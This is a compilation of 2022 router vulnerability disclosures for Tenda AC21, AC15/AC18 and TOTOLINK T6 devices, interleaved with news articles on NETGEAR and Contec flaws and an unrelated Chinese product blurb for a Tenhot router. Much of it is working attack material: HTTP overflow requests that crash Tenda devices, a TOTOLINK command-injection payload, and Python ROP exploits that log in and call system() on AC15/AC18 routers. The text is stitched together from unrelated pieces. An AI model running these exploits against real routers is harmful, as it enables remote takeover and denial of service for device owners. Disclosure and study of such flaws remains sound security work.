Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, setSchedWifi.

**Tenda AC21(V16.03.08.15) contains heap Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a heap overflow vulnerability in file /bin/httpd, functionsetSchedWifi  .

This vulnerability allows attackers to cause a Denial of Service (DoS) via the schedStartTimeand  schedEndTimeparameter.

the strcpy(ptr+2, v8) and strcpy(ptr+10, v7) copies strings to heap buffer without checking its length, so there is a heap overflow.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/openSchedWifi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 224
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    schedStartTime=1111111111111111111111111111111111111111111111111111111111111111111111111111111&schedEndTime=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&schedWifiEnable=1&timeType=1
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40074: Vuln/Tenda AC21/3 at main · xxy1126/Vuln

Tenda AC21 V 16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, form_fast_setting_wifi_set.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionform_fast_setting_wifi_set

In this function, it calls sub_441F30(a1) and the vulnerability is in sub_441F30

In sub_441F30() , it calls sscanfto read strings in v5 which we can control through POST parameter timeZone. It doesn’t check the length of v5, and the v8, v9 is on the stack, so there is a stack overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/fast_setting_wifi_set HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 484
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    ssid=1&timeZone=1:1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

CVE-2022-40075: Vuln/Tenda AC21/1 at main · xxy1126/Vuln

Tenda AC21 V16.03.08.15 is vulnerable to Buffer Overflow via /bin/httpd, function: fromSetWifiGusetBasic.

**Tenda AC21(V16.03.08.15) contains Stack Buffer Overflow Vulnerability****overview**

*   Manufacturer's website information：https://www.tenda.com.cn/
*   Firmware download address: https://www.tenda.com.cn/download/detail-3419.html

**product information**

Tenda A21(V16.03.08.15), latest version of simulation overview：

**description****1\. Vulnerability Details**

Tenda AC21(V16.03.08.15) contains a stack overflow vulnerability in file /bin/httpd, functionfromSetWifiGusetBasic

Attacker can use this vulnerability via theshareSpeed parameter.

it calls strcpy(v12, v7) and v12 is on the stack, so there is a stack buffer overflow vulnerability.

**2\. Recurring loopholes and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/WifiGuestSet HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 23
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/system_time.html?random=0.9865714904007963&
    Accept-Encoding: gzip, deflate
    Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
    Connection: close
    
    shareSpeed=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
    

By sending this poc, we can cause httpd reboot.

CVE-2022-40076: Vuln/Tenda AC21/4 at main · xxy1126/Vuln

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Adam Bannister 16 September 2022 at 16:10 UTC  
Updated: 16 September 2022 at 16:11 UTC

Silicon Valley vendor tackles command injection and MitM-to-RCE issues

Vulnerabilities in a third-party module within the firmware of NETGEAR routers and Orbi WiFi Systems could lead to arbitrary code execution on affected devices.

The component in question is FunJSQ, “a third-party gaming speed-improvement service” developed by China-based Xiamen Xunwang Network Technology, included in NETGEAR firmware images, according to a security advisory published yesterday (September 15) by European IoT security firm ONEKEY.

Now patched, the high severity flaws included an unauthenticated command injection flaw (CVE-2022-40619), and an insecure auto-update mechanism (CVE-2022-40620) that enabled manipulator-in-the-middle (MitM) attacks, potentially leading to remote code execution (RCE).

Read more of the latest hardware security news

The issues, which were both given a CVSS score of 7.7, can only be exploited if an attacker has the victim’s WiFi password or access to an Ethernet connection to the router, according to a NETGEAR advisory.

Moreover, ONEKEY indicated that FunJSQ is seemingly only enabled when the Quality of Service (QoS) feature, which prioritizes internet traffic for applications like VoIP or online gaming, is also activated.

**Insecure auto-update**

The insecure auto-update mechanism led to arbitrary code execution from the WAN interface due to a trio of issues.

First, insecure communications arose from the “explicit disabling of certificate validation (-k), which allows us to tamper with data returned from the server”, according to ONEKEY researchers.

Second, the “update packages are simply validated via a hash checksum, packages are not signed in any way”.

And finally, “arbitrary extraction to the root path with elevated privilege \[allowed\] whoever controls the update package to overwrite anything anywhere on the device (which puts a lot of trust in a third party supplier)”.

**Command injection**

The command injection issue was discovered during an investigation of , which was exposed by HTTP server .

This endpoint accepted parameters that required an authentication token generated by a weak algorithm that used a hardcoded string and the device MAC address.

The resulting token was sent to a remote FunJSQ service for validation by curl.

“We found that the curl command line is built using the value, which is user controlled and unsanitized prior to creating the full command line,” revealed the researchers.

**Coordinated disclosure**

ONEKEY reported the bug to NETGEAR on May 19, and the Silicon Valley vendor disclosed details of the flaw alongside firmware updates on September 9.

Affected router models include R6230, R6260, R7000, R8900, R9000, and XR300, while the vulnerable Orbi WiFi Systems models are RBR20, RBS20, RBR50, and RBS50.

ONEKEY said the research highlighted the supply chain threat posed by “undocumented and vulnerable software components in widely deployed embedded devices”.

The researchers urged vendors to “assure that all included third-party vendors adhere to at least the same cybersecurity standards” as their own.

YOU MIGHT ALSO LIKE WAPPLES web application firewall faulted for multiple flaws

NETGEAR resolves router vulnerabilities in bundled gaming component

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to Buffer Overflow via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a buf overflow in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, v7 get from pin,and then pass to v16 , but dont check the length.

finally ,cause overflow.

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": b'a'*0x200 
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38827: CVE/setWiFiWpsStart_2.md at main · whiter6666/CVE

TOTOLINK T6 V4.1.5cu.709_B20210518 is vulnerable to command injection via cstecgi.cgi

Permalink

**Command Injection****TOTOLINK\_T6**

version: V4.1.5cu.709\_B20210518

**Description:**

There is a execute arbitrary command in cstecgi.cgi

**Source:**

you may download it from : http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=16&ids=36

**Analyse:**

in sub\_421AA0, pin get from mac ,and then v7->v16->v11->v15->v13

finally execute system

**POC**

    from pwn import *
    import json
    
    data = {
        "topicurl": "setting/setWiFiWpsStart",
        "wscMode": "1",
        "pin": " ;ls > /tmp/1;:  "
    }
    
    data = json.dumps(data)
    print(data)
    
    argv = [
        "qemu-mipsel-static",
        "-g", "1234",
        "-L", "./root/",
        "-E", "CONTENT_LENGTH={}".format(len(data)),
        "-E", "REMOTE_ADDR=192.168.0.1",
        "./cstecgi.cgi"
    ]
    
    a = process(argv=argv)
    a.sendline(data.encode())
    
    a.interactive()

CVE-2022-38828: CVE/setWiFiWpsStart_1.md at main · whiter6666/CVE

By Deeba Ahmed
The Flexlan FXA3000 and FXA2000 series LAN devices made by the Japan-based firm contain two critical vulnerabilities tracked as CVE–2022–36158 and CVE–2022–36159.
This is a post from HackRead.com Read the original post: Critical Vulnerabilities Found in Devices That Provide WiFi on Airplanes

Necrum Security Labs’ researchers Samy Younsi and Thomas Knudsen have discovered two critical vulnerabilities in the wireless LAN devices manufactured by Contec. The company specializes in industrial automation, computing, and IoT communication technology.

**Research Details**

Reportedly, the Flexlan FXA3000 and FXA2000 series LAN devices made by the Japan-based firm contain two critical vulnerabilities tracked as CVE–2022–36158 and CVE–2022–36159.

For your information, these devices are used in airplanes to offer internet connectivity. The abovementioned series of devices offer WiFi access points in airplanes to ensure uninterrupted high-speed internet communication so that passengers could enjoy music, movies, and even purchased goodies during the flight. Hence, these vulnerabilities can allow an adversary to hack the inflight entertainment system and more.

FXA2000 (left) and FXA3000 (right)

Researchers discovered the first vulnerability (CVE–2022–36158) while performing the firmware’s reverse engineering. They identified a hidden page, which wasn’t listed in the Wireless LAN Manager interface. This page facilitates the execution of Linux commands on the device with root privileges. They could then access all system files and open the telnet port to gain complete access to the device.

The second vulnerability (CVE–2022–36159) entailed the use of hard-coded, weak cryptographic keys and backdoor accounts. While investigating, they also learned that the shadow file contained the has of two users, including root and user, and within a few minutes they could access them through a brute-force attack.

**How to Fix the Issues?**

In their blog post, researchers explained that the device owner could change the account’s user password from the web admin’s interface, which is the primary reason behind the emergence of these flaws. The root account is reserved for Contec for maintenance purposes.

Therefore, an attacker armed with the root hard-coded password can conveniently access all FXA2000 and FXA3000 series devices.

In order to fix the first issue, the hidden engineering web page must be removed from the under-production devices because the default password is weak and makes it easy for an attacker to inject a backdoor into the device using this page.

Furthermore, the company needs to generate a unique password for each device during the production phase for the second issue.

As pointed out by Eduard Kovacs of SecurityWeek, in its advisory, Contec explained that the vulnerabilities are connected to a private webpage created for developers to execute system commands and the page isn’t linked to other pages available to users. These vulnerabilities have been addressed in versions 1.16.00 for the FX3000 series and 1.39.00 for FX2000 series devices.

1.  Reporter Gets His Email Hacked on The Plane
2.  This map shows free WiFi passwords from airports worldwide
3.  Vulnerable In-flight WiFi lets hackers remotely takeover modern aircraft
4.  Flight tracking service Flightradar24 hacked; 230,000 accounts affected
5.  Inflight Entertainment Service Provider Gogo Launches Bug Bounty Program

Critical Vulnerabilities Found in Devices That Provide WiFi on Airplanes

Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router V15.03.05.19_multi were discovered to contain a buffer overflow via the filePath parameter at /goform/expandDlnaFile.

Vendor of the products:　Tenda

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　AC15 V15.03.05.19\_multi, AC18 V15.03.05.19\_multi

**Overview**

An issue was discovered on Tenda AC15 V15.03.05.19\_multi and AC18 V15.03.05.19\_multi devices. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the **/goform/expandDlnaFile** filePath parameter for a post request, the value is directly used in a _sprintf_ function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

**Exp**

import requests
from urllib import parse
from pwn import \*

main\_url \= "http://127.0.0.1:80"

def login\_success():
    global password
    url \= main\_url + "/login/Auth"
    s \= requests.Session()
    s.verify \= False
    headers \= {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    data \= {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"}
    data \= parse.urlencode(data)

    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    password \= response.cookies.get\_dict().get("password")
    print(response)
    if password is None:
        login\_success()
    else:
        print(password)

def poc():
    url \= main\_url + "/goform/expandDlnaFile"

    cmd \= b'echo yab....'
    libc\_base \= 0x40202000
    system\_offset \= 0x0005a270
    system\_addr \= libc\_base + system\_offset
    gadget1 \= libc\_base + 0x00018298
    gadget2 \= libc\_base + 0x00040cb8
 
    headers \= {'Cookie': 'password=' + password}
    data \= b'filePath='+ b'A' \* (1074) + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
    data \= data.decode('latin1')
    print(len(data))
    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    print(response)

if \_\_name\_\_ \== "\_\_main\_\_":
    login\_success()
    poc()

**Vul Details****Code in httpd**

**Attack effect**

CVE-2022-38325: Vuls/Vul_expandDlnaFile.md at main · 1160300418/Vuls

Tenda AC15 WiFi Router V15.03.05.19_multi and AC18 WiFi Router V15.03.05.19_multi were discovered to contain a buffer overflow via the page parameter at /goform/NatStaticSetting.

Vendor of the products:　Tenda

Reported by: 　　　　　 x.sunzh@gmail.com

Affected products:　　　AC15 V15.03.05.19\_multi, AC18 V15.03.05.19\_multi

**Overview**

An issue was discovered on Tenda AC15 V15.03.05.19\_multi and AC18 V15.03.05.19\_multi device. There is a buffer overflow vulnerability in the router’s web server – httpd. While processing the **/goform/NatStaticSetting** page parameter for a post request, the value is directly used in a _sprintf_ function and passed to a local variable placed on the stack, which can override the return address of the function. The attackers can construct a payload to carry out arbitrary code attacks.

**PoC**

**Exp**

import requests
from urllib import parse
from pwn import \*

main\_url \= "http://127.0.0.1:80"

def login\_success():
    global password
    url \= main\_url + "/login/Auth"
    s \= requests.Session()
    s.verify \= False
    headers \= {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'}
    data \= {"username": "admin", "password": "ce80adc6ed1ab2b7f2c85b5fdcd8babc"}
    data \= parse.urlencode(data)

    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    password \= response.cookies.get\_dict().get("password")
    print(response)
    if password is None:
        login\_success()
    else:
        print(password)

def poc():
    url \= main\_url + "/goform/NatStaticSetting"

    cmd \= b'echo yab....'
    libc\_base \= 0x40202000
    system\_offset \= 0x0005a270
    system\_addr \= libc\_base + system\_offset
    gadget1 \= libc\_base + 0x00018298
    gadget2 \= libc\_base + 0x00040cb8
    
    print(hex(gadget1), hex(gadget2))
    headers \= {'Cookie': 'password=' + password}
    data \= b'op=no&page='+ b'A' \* (244) + p32(gadget1) + b'A' \* 16 + p32(gadget1) + p32(system\_addr) + p32(gadget2) + cmd
    data \= data.decode('latin1')
    print(len(data))
    response \= requests.post(url\=url, headers\=headers, data\=data, allow\_redirects\=False)
    print(response.text)

if \_\_name\_\_ \== "\_\_main\_\_":
    login\_success()
    poc()

**Vul Details****Codes in httpd**

**Attack Effect**

CVE-2022-38326: Vuls/Vul_NatStaticSetting.md at main · 1160300418/Vuls

There is a remote code execution (RCE) vulnerability in Tenhot TWS-100 V4.0-201809201424 router device. It is necessary to know that the device account password is allowed to escape the execution system command through the network tools in the network diagnostic component.

**匠心设计，工业级标准**

内置工业级元件，经典外壳设计；

强效散热设计，智能降噪；

**全千兆5口**，1个WAN口，1个LAN口，3个WAN/LAN口；

带机量100人，可同时管理32台腾狐无线AP。

**稳定，仅是标配**

高性能芯片，数据传输更稳定；

优良的策略带宽控制，智能QoS流控；

支持PPPOE、静态IP、自动获取接入、PPTP；

可在-20℃-70℃的极端环境下稳定工作。

**全面的行为管理审计**

行为管理，对内网用户的所有上网行为进行精细化的管理，屏蔽各种违法网站，营造良好的网络环境，提高工作效率；

应用控制，用户可对应用规则库内的游戏网站、在线视频、彩票、电脑页游、手游等应用进行上网限制，管理上网行为

满足公安部82号令，可广泛应用于公共场所有线及无线网络建设；

应用规则库免费升级，与时俱进，定期在线更新。

**精准的流量控制**

保障关键业务带宽，资源按需分配；

精确识别各类主流应用，可以实现对网络带宽资源的全面、精细管控；

带宽空闲时充分利用，带宽紧张时按需分配，确保网络流畅稳定。

**内置七层防火墙模块，安全保护**

对IP、MAC地址、端口和协议进行相应的放通或阻断；

防止有人利用内部网络，将内部的文件、数据上传到外部网络；

两大多WAN负载策略，有效保障网络稳定性；

支持VLAN隔离、AP隔离、端口隔离等隔离手段。

**云平台管理**

腾狐自主研发的综合性网管云平台；

针对分布式部署的设备进行统一管理；

支持微信认证等多种认证策略，多种选择的广告模板；

根据设备的实际部署情况，创建不同的区域和站点；

一目了然，整个网络所有设备的安装及上线情况。

**简单管理，方便维护**

基于中文Web网页管理，界面简洁，操作简单；

免费云端管理，集中/分组管理，远程维护；

支持微信认证、Web认证等多种认证方式；

提供网络检测：私接路由器探测、网络工具、应用控制强制开关和防火墙放通功能。

**更多丰富功能，满足多种选择**

多WAN接入，单线多拨，无缝漫游，wifi计费系统，wifi考勤系统；

支持静态IP分配批量处理，减少重复操作；

免费支持VPN功能，满足企业远程办公需求；

强大的UPnP功能，快速飙升迅雷、BT等P2P软件的下载速度；

永不停歇的产品功能更新及性能优化，提供最优质的网络产品，提升用户体验。

Tag

#wifi